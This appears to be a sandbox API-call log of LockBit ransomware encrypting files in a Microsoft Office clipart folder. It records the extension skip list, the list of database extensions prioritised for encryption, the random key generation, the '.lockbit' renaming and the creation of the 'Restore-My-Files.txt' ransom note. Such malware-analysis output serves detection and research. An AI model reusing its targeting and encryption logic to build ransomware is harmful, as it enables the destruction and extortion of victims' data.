(FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.707] free (_Block=0x1fa2ed8) [0169.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.707] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.707] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ff1700, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9ff1700, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x5f2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02740G.GIF", cAlternateFileName="")) returned 1 [0169.707] lstrcmpiW (lpString1=".", lpString2="PH02740G.GIF") returned -1 [0169.707] lstrcmpiW (lpString1="..", lpString2="PH02740G.GIF") returned -1 [0169.707] PathFindExtensionW (pszPath="PH02740G.GIF") returned=".GIF" [0169.708] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0169.708] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0169.708] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0169.709] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0169.709] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0169.709] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0169.709] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0169.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02740G.GIF") returned 1 [0169.710] lstrcmpiW (lpString1="ntldr", lpString2="PH02740G.GIF") returned -1 [0169.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02740G.GIF") returned -1 [0169.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02740G.GIF") returned -1 [0169.710] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02740G.GIF") returned -1 [0169.710] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02740G.GIF") returned 1 [0169.710] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02740G.GIF") returned -1 [0169.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF") returned=".GIF" [0169.710] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0169.710] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0169.710] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0169.710] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0169.711] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0169.711] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0169.711] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0169.711] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF.lockbit") returned 72 [0169.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.720] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.720] malloc (_Size=0x40068) returned 0x3df0008 [0169.720] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24363) returned 1 [0169.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.721] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.728] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.728] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.731] free (_Block=0x1fa2ed8) [0169.731] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.731] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.732] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x747f6500, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x747f6500, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02740U.BMP", cAlternateFileName="")) returned 1 [0169.732] lstrcmpiW (lpString1=".", lpString2="PH02740U.BMP") returned -1 [0169.732] lstrcmpiW (lpString1="..", lpString2="PH02740U.BMP") returned -1 [0169.732] PathFindExtensionW (pszPath="PH02740U.BMP") returned=".BMP" [0169.732] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.732] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.732] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.732] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.732] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.733] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.733] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.733] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02740U.BMP") returned 1 [0169.734] lstrcmpiW (lpString1="ntldr", lpString2="PH02740U.BMP") returned -1 [0169.734] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02740U.BMP") returned -1 [0169.734] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02740U.BMP") returned -1 [0169.734] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02740U.BMP") returned -1 [0169.734] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02740U.BMP") returned 1 [0169.734] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02740U.BMP") returned -1 [0169.734] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.734] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP") returned=".BMP" [0169.734] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.734] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.734] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.735] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.735] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP.lockbit") returned 72 [0169.735] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.736] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.736] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.736] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32616) returned 1 [0169.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.739] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.748] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.748] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.748] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.749] free (_Block=0x1fa2ed8) [0169.749] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.749] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.749] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf53a6300, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53a6300, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x50a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02742G.GIF", cAlternateFileName="")) returned 1 [0169.749] lstrcmpiW (lpString1=".", lpString2="PH02742G.GIF") returned -1 [0169.749] lstrcmpiW (lpString1="..", lpString2="PH02742G.GIF") returned -1 [0169.750] PathFindExtensionW (pszPath="PH02742G.GIF") returned=".GIF" [0169.750] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0169.750] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0169.750] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0169.751] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0169.751] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0169.751] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0169.751] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0169.751] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0169.751] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02742G.GIF") returned 1 [0169.752] lstrcmpiW (lpString1="ntldr", lpString2="PH02742G.GIF") returned -1 [0169.752] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02742G.GIF") returned -1 [0169.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02742G.GIF") returned -1 [0169.752] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02742G.GIF") returned -1 [0169.752] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02742G.GIF") returned 1 [0169.752] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02742G.GIF") returned -1 [0169.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.752] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF") returned=".GIF" [0169.752] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0169.752] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0169.752] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0169.752] lstrcmpiW 